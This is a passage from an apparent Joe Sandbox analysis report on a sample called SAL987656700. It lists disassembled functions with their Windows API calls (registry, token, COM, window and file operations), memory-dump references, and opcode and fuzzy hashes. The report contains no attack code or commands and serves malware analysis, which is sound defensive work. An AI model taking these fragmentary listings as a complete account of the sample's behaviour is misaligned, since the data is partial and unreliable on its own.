                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                      • Instruction ID: 6c007c246c8d73fffd159a8248cc638b946bead664e9c2fc0bc10d5b2be50728
                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                      • Instruction Fuzzy Hash: 0E11F671940B04BADA21BFB8CC46FCB7B9CFF04700F404C25B29DE6692EA65A5098666
                                      Function 008EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008EDA74
                                      • LoadStringW.USER32(00000000), ref: 008EDA7B
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008EDA91
                                      • LoadStringW.USER32(00000000), ref: 008EDA98
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008EDADC
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 008EDAB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 4072794657-3128320259
                                      • Opcode ID: f84a8f64ff3d1bb9180d3dc3d3a256ce5ffc166ddaf4b680f1fa6d9d29077eb3
                                      • Instruction ID: 6baeb40282ccb502ccf3e467a3c863b524ec3ebf6f4a49073ff68aff987c065a
                                      • Opcode Fuzzy Hash: f84a8f64ff3d1bb9180d3dc3d3a256ce5ffc166ddaf4b680f1fa6d9d29077eb3
                                      • Instruction Fuzzy Hash: 340186F66443187FEB109BA49D89EEB336CE709345F4044A1F746E2041E6749E848F75
                                      Function 008F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(01052F18,01052F18), ref: 008F097B
                                      • RtlEnterCriticalSection.NTDLL(01052EF8), ref: 008F098D
                                      • TerminateThread.KERNEL32(00720065,000001F6), ref: 008F099B
                                      • WaitForSingleObject.KERNEL32(00720065,000003E8), ref: 008F09A9
                                      • CloseHandle.KERNEL32(00720065), ref: 008F09B8
                                      • InterlockedExchange.KERNEL32(01052F18,000001F6), ref: 008F09C8
                                      • RtlLeaveCriticalSection.NTDLL(01052EF8), ref: 008F09CF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 5691f9facb7508a5adc4a5258c370892c4e08793d2f34fce6c0f8a5055716050
                                      • Instruction ID: fcc3bbc47b24ee86e23608808c0bf81167579479699270981385062758115e2c
                                      • Opcode Fuzzy Hash: 5691f9facb7508a5adc4a5258c370892c4e08793d2f34fce6c0f8a5055716050
                                      • Instruction Fuzzy Hash: 23F08171696612BFD7411FA0EE8CBE67B35FF01702F805411F201908A1C7749461DF90
                                      Function 008B01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                      Download Yara Rule
                                      APIs
                                      • __allrem.LIBCMT ref: 008B00BA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B00D6
                                      • __allrem.LIBCMT ref: 008B00ED
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B010B
                                      • __allrem.LIBCMT ref: 008B0122
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B0140
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction ID: cca79d5ff11f8ad2420fc92208b040744d7a365838252a434c0d48c314671472
                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction Fuzzy Hash: F881C471A00B069FE724AA6CCC41BAB73E9FF46364F24452EF551D7782EBB0D9008B51
                                      Function 008B61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008A82D9,008A82D9,?,?,?,008B644F,00000001,00000001,8BE85006), ref: 008B6258
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008B644F,00000001,00000001,8BE85006,?,?,?), ref: 008B62DE
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008B63D8
                                      • __freea.LIBCMT ref: 008B63E5
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      • __freea.LIBCMT ref: 008B63EE
                                      • __freea.LIBCMT ref: 008B6413
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 289bd6fdb7707fa91f029b00f8b3bd81ed1ee18f036a5f40d145d4feca482d48
                                      • Instruction ID: a64b1e528148eb6509042756410ad134efef6e9d43ad4021761b783978a8274c
                                      • Opcode Fuzzy Hash: 289bd6fdb7707fa91f029b00f8b3bd81ed1ee18f036a5f40d145d4feca482d48
                                      • Instruction Fuzzy Hash: 6B51C172A00216ABEB258F64DC81EEF77A9FB48750F144629FC15D6340EB38DC64D661
                                      Function 0090BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 0090C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090B6AE,?,?), ref: 0090C9B5
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090C9F1
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA68
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090BCCA
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090BD25
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090BD6A
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0090BD99
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0090BDF3
                                      • RegCloseKey.ADVAPI32(?), ref: 0090BDFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 1120388591-0
                                      • Opcode ID: 67044df112705e21413e9cb3f1d364436f092acaeb57a8b2d53e8280ab0833bc
                                      • Instruction ID: 07defe4a2c196175e0d35d44dc950959024d7d248e564bd56df2212335de2f7c
                                      • Opcode Fuzzy Hash: 67044df112705e21413e9cb3f1d364436f092acaeb57a8b2d53e8280ab0833bc
                                      • Instruction Fuzzy Hash: A8818F70218241AFD714EF24C895E6ABBE9FF84308F14895CF5958B2A2DB31ED45CB92
                                      Function 008DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000035), ref: 008DF7B9
                                      • SysAllocString.OLEAUT32(00000001), ref: 008DF860
                                      • VariantCopy.OLEAUT32(008DFA64,00000000), ref: 008DF889
                                      • VariantClear.OLEAUT32(008DFA64), ref: 008DF8AD
                                      • VariantCopy.OLEAUT32(008DFA64,00000000), ref: 008DF8B1
                                      • VariantClear.OLEAUT32(?), ref: 008DF8BB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCopy$AllocInitString
                                      • String ID:
                                      • API String ID: 3859894641-0
                                      • Opcode ID: 6385dbe0f440273d7e58ed4eeab6b27758cf15db24acf1f0ef7f24b99328ba02
                                      • Instruction ID: d856ec166d3286c3ecd6dc59a419df46051723564626ffc25575ac8746618230
                                      • Opcode Fuzzy Hash: 6385dbe0f440273d7e58ed4eeab6b27758cf15db24acf1f0ef7f24b99328ba02
                                      • Instruction Fuzzy Hash: 2351F531A50314BACF20AB69D8A5B29B7A4FF45314B248567EA07DF393DB708C40E797
                                      Function 0089920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • BeginPaint.USER32(?,?,?), ref: 00899241
                                      • GetWindowRect.USER32(?,?), ref: 008992A5
                                      • ScreenToClient.USER32(?,?), ref: 008992C2
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008992D3
                                      • EndPaint.USER32(?,?,?,?,?), ref: 00899321
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008D71EA
                                        • Part of subcall function 00899339: BeginPath.GDI32(00000000), ref: 00899357
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 3050599898-0
                                      • Opcode ID: 9e8e3946f66e24440a99711a443c37308d3a753fdd2f8358c90a818febeccad1
                                      • Instruction ID: c462daae2fb4301481ad6d1f4d2baf6c40e8d5b9b077f26fcd47ab811b230593
                                      • Opcode Fuzzy Hash: 9e8e3946f66e24440a99711a443c37308d3a753fdd2f8358c90a818febeccad1
                                      • Instruction Fuzzy Hash: B341B370208301AFDB11EF59DC94FAA7BA8FB45365F04026DF9A5C72A1D7309845EB62
                                      Function 008F07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 008F080C
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 008F0847
                                      • RtlEnterCriticalSection.NTDLL(?), ref: 008F0863
                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 008F08DC
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008F08F3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 008F0921
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                      • String ID:
                                      • API String ID: 3368777196-0
                                      • Opcode ID: e335fce4c2d8d56612609cb486b3e3143a88c80ddcb1f3b1af02478e0e0d9158
                                      • Instruction ID: 7bf4930dc06f971dc894361a374821972308ff4e208a4285dbfffd4dacd010d2
                                      • Opcode Fuzzy Hash: e335fce4c2d8d56612609cb486b3e3143a88c80ddcb1f3b1af02478e0e0d9158
                                      • Instruction Fuzzy Hash: 5F415A71A14209AFDF14AF64DC85AAA7778FF04310B1480A5EE00DA297D730DE64DBA1
                                      Function 009181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,008DF3AB,00000000,?,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 0091824C
                                      • EnableWindow.USER32(00000000,00000000), ref: 00918272
                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009182D1
                                      • ShowWindow.USER32(00000000,00000004), ref: 009182E5
                                      • EnableWindow.USER32(00000000,00000001), ref: 0091830B
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0091832F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: d8aa34aef7b6ae3a86a9866748c21530e1b59767a29967fa117895baa8834852
                                      • Instruction ID: 0ff73d3a98039005bde21e317ba12c17f9216ae7fcbaae9c1cdf39d639b36aa6
                                      • Opcode Fuzzy Hash: d8aa34aef7b6ae3a86a9866748c21530e1b59767a29967fa117895baa8834852
                                      • Instruction Fuzzy Hash: C5410670705608AFDB26CF15D899BE57BE4FB0A755F184168E5284F2B2CB71AC81EB40
                                      Function 008E4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 008E4C95
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008E4CB2
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008E4CEA
                                      • _wcslen.LIBCMT ref: 008E4D08
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008E4D10
                                      • _wcsstr.LIBVCRUNTIME ref: 008E4D1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                      • String ID:
                                      • API String ID: 72514467-0
                                      • Opcode ID: dde8c46ffd325e646ee26dc00b87b85a2ecefe131debad9436fd5e7c32d91733
                                      • Instruction ID: 774f3186512ba657d1b32c3d5e3544d33530c2159461e80fd4e5e8257810a5b6
                                      • Opcode Fuzzy Hash: dde8c46ffd325e646ee26dc00b87b85a2ecefe131debad9436fd5e7c32d91733
                                      • Instruction Fuzzy Hash: EC212672304245BBEB255B3AAC09E7F7B9CFF46750F149029F809CA192EA61DC00D2A1
                                      Function 008F581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00883AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00883A97,?,?,00882E7F,?,?,?,00000000), ref: 00883AC2
                                      • _wcslen.LIBCMT ref: 008F587B
                                      • CoInitialize.OLE32(00000000), ref: 008F5995
                                      • CoCreateInstance.COMBASE(0091FCF8,00000000,00000001,0091FB68,?), ref: 008F59AE
                                      • CoUninitialize.COMBASE ref: 008F59CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 3172280962-24824748
                                      • Opcode ID: f7fd8a2fb0a5a6e5d2b36cb4846fdb8441ea3b16b3185905f7124fa1bfd02b92
                                      • Instruction ID: 2d0e96242ba677e672ed2a4a172ededd8ecab6441d5fb0b09ac3b16cd48f6883
                                      • Opcode Fuzzy Hash: f7fd8a2fb0a5a6e5d2b36cb4846fdb8441ea3b16b3185905f7124fa1bfd02b92
                                      • Instruction Fuzzy Hash: ACD153716087059FC714EF28C48092ABBE5FF89724F148859FA89DB361DB31ED45CB92
                                      Function 008E175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E0FCA
                                        • Part of subcall function 008E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E0FD6
                                        • Part of subcall function 008E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E0FE5
                                        • Part of subcall function 008E0FB4: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008E0FEC
                                        • Part of subcall function 008E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E1002
                                      • GetLengthSid.ADVAPI32(?,00000000,008E1335), ref: 008E17AE
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008E17BA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008E17C1
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008E17DA
                                      • GetProcessHeap.KERNEL32(00000000,00000000,008E1335), ref: 008E17EE
                                      • HeapFree.KERNEL32(00000000), ref: 008E17F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 169236558-0
                                      • Opcode ID: 546342495914fb36edf5852b3dfc4aad99019eadc61b6f745775f5b4be402145
                                      • Instruction ID: 1c4805842b9a2dabfe874ca72597a09a4996ecf0ff48d0b65105236f2889c4a2
                                      • Opcode Fuzzy Hash: 546342495914fb36edf5852b3dfc4aad99019eadc61b6f745775f5b4be402145
                                      • Instruction Fuzzy Hash: 7A11A9726A8205FFDF109FA5CC49BAE7BA9FB46759F108018F881E7214C736A940DB60
                                      Function 008A3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,008A3379,008A2FE5), ref: 008A3390
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008A339E
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A33B7
                                      • SetLastError.KERNEL32(00000000,?,008A3379,008A2FE5), ref: 008A3409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
